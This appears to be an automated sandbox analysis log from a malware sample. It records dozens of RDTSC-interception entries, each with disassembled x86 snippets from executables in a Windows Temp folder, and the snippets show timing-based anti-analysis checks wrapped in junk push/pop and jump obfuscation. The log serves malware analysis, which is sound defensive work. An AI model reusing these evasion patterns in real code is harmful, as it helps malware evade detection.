Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50B0A3A second address: 50B0AA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [76FA6968h], 00000002h 0x00000010 pushad 0x00000011 push esi 0x00000012 pushfd 0x00000013 jmp 00007F473118FE5Bh 0x00000018 adc ecx, 3A33394Eh 0x0000001e jmp 00007F473118FE69h 0x00000023 popfd 0x00000024 pop eax 0x00000025 mov si, di 0x00000028 popad 0x00000029 jne 00007F47A2FF5789h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F473118FE66h 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50B0AA1 second address: 50B0AE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F47311907B1h 0x00000009 or si, 66E6h 0x0000000e jmp 00007F47311907B1h 0x00000013 popfd 0x00000014 mov dx, si 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov edx, dword ptr [ebp+0Ch] 0x0000001d pushad 0x0000001e mov dl, al 0x00000020 mov bl, 62h 0x00000022 popad 0x00000023 xchg eax, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50B0AE3 second address: 50B0AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50B0AE7 second address: 50B0AED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0EE0 second address: 50C0EF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F473118FE5Fh 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0EF5 second address: 50C0F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F47311907B4h 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F47311907B7h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0F2B second address: 50C0FBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d mov ebx, eax 0x0000000f pushfd 0x00000010 jmp 00007F473118FE66h 0x00000015 or si, 3A28h 0x0000001a jmp 00007F473118FE5Bh 0x0000001f popfd 0x00000020 popad 0x00000021 pushfd 0x00000022 jmp 00007F473118FE68h 0x00000027 sub cx, EC88h 0x0000002c jmp 00007F473118FE5Bh 0x00000031 popfd 0x00000032 popad 0x00000033 pop ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F473118FE65h 0x0000003b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0D49 second address: 50C0D4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0D4F second address: 50C0D9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F473118FE63h 0x00000015 sbb cx, 0B7Eh 0x0000001a jmp 00007F473118FE69h 0x0000001f popfd 0x00000020 mov edi, eax 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0D9C second address: 50C0DE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 mov bx, 6CEAh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e mov di, ax 0x00000011 movzx ecx, dx 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F47311907B5h 0x0000001b mov ebp, esp 0x0000001d jmp 00007F47311907AEh 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov edi, 6C45B820h 0x0000002b push edi 0x0000002c pop ecx 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0DE3 second address: 50C0DF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F473118FE61h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0DF8 second address: 50C0DFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 5140611 second address: 5140667 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pop esi 0x0000000e pop ebx 0x0000000f mov dx, ax 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F473118FE5Ch 0x0000001c sbb ecx, 73E61118h 0x00000022 jmp 00007F473118FE5Bh 0x00000027 popfd 0x00000028 pushad 0x00000029 mov ax, 2165h 0x0000002d mov dx, cx 0x00000030 popad 0x00000031 popad 0x00000032 pop ebp 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 5140667 second address: 514066B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 514066B second address: 5140671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 51308C0 second address: 51308D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47311907ACh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 51308D0 second address: 51308D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 51307EB second address: 5130826 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F47311907ACh 0x00000008 xor eax, 0D6DC6F8h 0x0000000e jmp 00007F47311907ABh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F47311907B4h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 5130826 second address: 5130886 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F473118FE64h 0x00000011 sbb eax, 7D3F2BB8h 0x00000017 jmp 00007F473118FE5Bh 0x0000001c popfd 0x0000001d mov di, ax 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 pushad 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 call 00007F473118FE5Ch 0x0000002c pop eax 0x0000002d popad 0x0000002e mov si, bx 0x00000031 popad 0x00000032 pop ebp 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 mov esi, 42AB0265h 0x0000003b mov ebx, esi 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50D027C second address: 50D02BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dx, si 0x0000000e mov edi, eax 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov si, 7D8Dh 0x00000019 pushfd 0x0000001a jmp 00007F47311907AAh 0x0000001f sbb al, FFFFFFA8h 0x00000022 jmp 00007F47311907ABh 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50D02BC second address: 50D02C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 5130B85 second address: 5130B8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 7A72h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 5130B8E second address: 5130BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a mov ebx, 2E4EDA58h 0x0000000f pushfd 0x00000010 jmp 00007F473118FE61h 0x00000015 or ecx, 12E14F46h 0x0000001b jmp 00007F473118FE61h 0x00000020 popfd 0x00000021 popad 0x00000022 push dword ptr [ebp+0Ch] 0x00000025 pushad 0x00000026 call 00007F473118FE5Ch 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0607 second address: 50E060C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E060C second address: 50E0612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0612 second address: 50E0620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0620 second address: 50E0626 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0626 second address: 50E0668 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F47311907B0h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov cx, 94ADh 0x00000018 mov esi, 7498CEA9h 0x0000001d popad 0x0000001e push FFFFFFFEh 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F47311907AEh 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0668 second address: 50E066C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E066C second address: 50E0672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0672 second address: 50E0717 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 1B829DD3h 0x0000000e pushad 0x0000000f push edx 0x00000010 mov ecx, 6CFB32F9h 0x00000015 pop ecx 0x00000016 push ebx 0x00000017 mov edx, ecx 0x00000019 pop esi 0x0000001a popad 0x0000001b xor dword ptr [esp], 6D7A5DCBh 0x00000022 pushad 0x00000023 mov eax, edx 0x00000025 popad 0x00000026 call 00007F473118FE59h 0x0000002b pushad 0x0000002c mov ax, 94DDh 0x00000030 push esi 0x00000031 pushfd 0x00000032 jmp 00007F473118FE69h 0x00000037 add ch, 00000026h 0x0000003a jmp 00007F473118FE61h 0x0000003f popfd 0x00000040 pop ecx 0x00000041 popad 0x00000042 push eax 0x00000043 jmp 00007F473118FE5Eh 0x00000048 mov eax, dword ptr [esp+04h] 0x0000004c jmp 00007F473118FE5Bh 0x00000051 mov eax, dword ptr [eax] 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F473118FE64h 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0717 second address: 50E07C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F47311907B1h 0x00000009 add esi, 62B70096h 0x0000000f jmp 00007F47311907B1h 0x00000014 popfd 0x00000015 mov si, 4107h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 jmp 00007F47311907ADh 0x00000025 pop eax 0x00000026 pushad 0x00000027 mov bx, ax 0x0000002a pushfd 0x0000002b jmp 00007F47311907B8h 0x00000030 or si, 2B18h 0x00000035 jmp 00007F47311907ABh 0x0000003a popfd 0x0000003b popad 0x0000003c mov eax, dword ptr fs:[00000000h] 0x00000042 jmp 00007F47311907B6h 0x00000047 nop 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F47311907B7h 0x0000004f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E07C2 second address: 50E07C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E07C7 second address: 50E085D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F47311907B3h 0x00000010 mov si, 917Fh 0x00000014 pop eax 0x00000015 popad 0x00000016 nop 0x00000017 jmp 00007F47311907ABh 0x0000001c sub esp, 1Ch 0x0000001f pushad 0x00000020 mov dh, cl 0x00000022 mov si, dx 0x00000025 popad 0x00000026 push esi 0x00000027 pushad 0x00000028 mov ecx, 18311675h 0x0000002d push eax 0x0000002e push edx 0x0000002f pop esi 0x00000030 pop ebx 0x00000031 popad 0x00000032 mov dword ptr [esp], ebx 0x00000035 jmp 00007F47311907B8h 0x0000003a xchg eax, esi 0x0000003b jmp 00007F47311907B0h 0x00000040 push eax 0x00000041 jmp 00007F47311907ABh 0x00000046 xchg eax, esi 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F47311907B5h 0x0000004e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E085D second address: 50E0863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0863 second address: 50E0894 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F47311907B5h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0894 second address: 50E08A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F473118FE5Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E08A4 second address: 50E08A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E08A8 second address: 50E08D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F473118FE5Eh 0x0000000e xchg eax, edi 0x0000000f pushad 0x00000010 jmp 00007F473118FE5Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 mov bx, cx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E09DE second address: 50E0A3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F47A2F5FADBh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F47311907B3h 0x00000018 sbb si, 37EEh 0x0000001d jmp 00007F47311907B9h 0x00000022 popfd 0x00000023 jmp 00007F47311907B0h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0A3C second address: 50E0A53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0A53 second address: 50E0A63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0A63 second address: 50E0AA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-20h], eax 0x0000000c jmp 00007F473118FE66h 0x00000011 mov ebx, dword ptr [esi] 0x00000013 pushad 0x00000014 mov edi, eax 0x00000016 push esi 0x00000017 mov ecx, edx 0x00000019 pop edi 0x0000001a popad 0x0000001b mov dword ptr [ebp-24h], ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push edx 0x00000022 pop ecx 0x00000023 mov cx, bx 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0AA1 second address: 50E0AA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0AA7 second address: 50E0AAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0AAB second address: 50E0ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ebx, ebx 0x0000000a pushad 0x0000000b mov bx, ax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0ABC second address: 50E0B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 je 00007F47A2F5F011h 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F473118FE68h 0x00000013 adc eax, 7C53E418h 0x00000019 jmp 00007F473118FE5Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F473118FE68h 0x00000025 add esi, 1C934E78h 0x0000002b jmp 00007F473118FE5Bh 0x00000030 popfd 0x00000031 popad 0x00000032 cmp ebx, FFFFFFFFh 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0B29 second address: 50E0B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0B2D second address: 50E0B48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0B48 second address: 50E0607 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 3FFAh 0x00000007 mov si, di 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jmp 00007F47A2F5F8CCh 0x00000012 jne 00007F47311907C9h 0x00000014 xor ecx, ecx 0x00000016 mov dword ptr [esi], ecx 0x00000018 mov dword ptr [esi+04h], ecx 0x0000001b mov dword ptr [esi+08h], ecx 0x0000001e mov dword ptr [esi+0Ch], ecx 0x00000021 mov dword ptr [esi+10h], ecx 0x00000024 mov dword ptr [esi+14h], ecx 0x00000027 mov ecx, dword ptr [ebp-10h] 0x0000002a mov dword ptr fs:[00000000h], ecx 0x00000031 pop ecx 0x00000032 pop edi 0x00000033 pop esi 0x00000034 pop ebx 0x00000035 mov esp, ebp 0x00000037 pop ebp 0x00000038 retn 0004h 0x0000003b nop 0x0000003c pop ebp 0x0000003d ret 0x0000003e add esi, 18h 0x00000041 pop ecx 0x00000042 cmp esi, 00CE35E8h 0x00000048 jne 00007F4731190790h 0x0000004a push esi 0x0000004b call 00007F4731191016h 0x00000050 push ebp 0x00000051 mov ebp, esp 0x00000053 push dword ptr [ebp+08h] 0x00000056 call 00007F47355D4715h 0x0000005b mov edi, edi 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F47311907B5h 0x00000064 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E001C second address: 50E0028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0028 second address: 50E003B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F47311907ADh 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E003B second address: 50E0074 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F473118FE5Ch 0x00000009 and ax, 05E8h 0x0000000e jmp 00007F473118FE5Bh 0x00000013 popfd 0x00000014 mov bh, ch 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp], ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F473118FE5Eh 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe RDTSC instruction interceptor: First address: 38CF64 second address: 38CF71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F47311907A6h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe RDTSC instruction interceptor: First address: 38CF71 second address: 38C76E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F473118FE56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c pushad 0x0000000d mov cl, ah 0x0000000f cmc 0x00000010 popad 0x00000011 push dword ptr [ebp+122D0631h] 0x00000017 cmc 0x00000018 call dword ptr [ebp+122D2363h] 0x0000001e pushad 0x0000001f jmp 00007F473118FE5Eh 0x00000024 or dword ptr [ebp+122D1FF0h], esi 0x0000002a xor eax, eax 0x0000002c add dword ptr [ebp+122D1FF0h], edx 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 stc 0x00000037 mov dword ptr [ebp+122D3486h], eax 0x0000003d mov dword ptr [ebp+122D2EB7h], edi 0x00000043 mov esi, 0000003Ch 0x00000048 jbe 00007F473118FE5Ch 0x0000004e jnp 00007F473118FE57h 0x00000054 add esi, dword ptr [esp+24h] 0x00000058 or dword ptr [ebp+122D1FF0h], eax 0x0000005e lodsw 0x00000060 stc 0x00000061 add eax, dword ptr [esp+24h] 0x00000065 mov dword ptr [ebp+122D2EB7h], ebx 0x0000006b mov ebx, dword ptr [esp+24h] 0x0000006f mov dword ptr [ebp+122D1FF0h], edx 0x00000075 nop 0x00000076 pushad 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe RDTSC instruction interceptor: First address: 38C76E second address: 38C79F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jns 00007F47311907ACh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F47311907B9h 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe RDTSC instruction interceptor: First address: 508D7B second address: 508D80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe RDTSC instruction interceptor: First address: 509060 second address: 509065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe RDTSC instruction interceptor: First address: 509065 second address: 509072 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jng 00007F473118FE56h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe RDTSC instruction interceptor: First address: 509072 second address: 5090A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F47311907B7h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F47311907B2h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe RDTSC instruction interceptor: First address: 5090A7 second address: 5090AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
